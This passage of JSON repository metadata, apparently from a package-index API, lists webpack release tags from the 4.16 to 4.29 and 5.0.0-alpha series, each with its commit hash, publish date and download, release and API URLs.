:"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","dow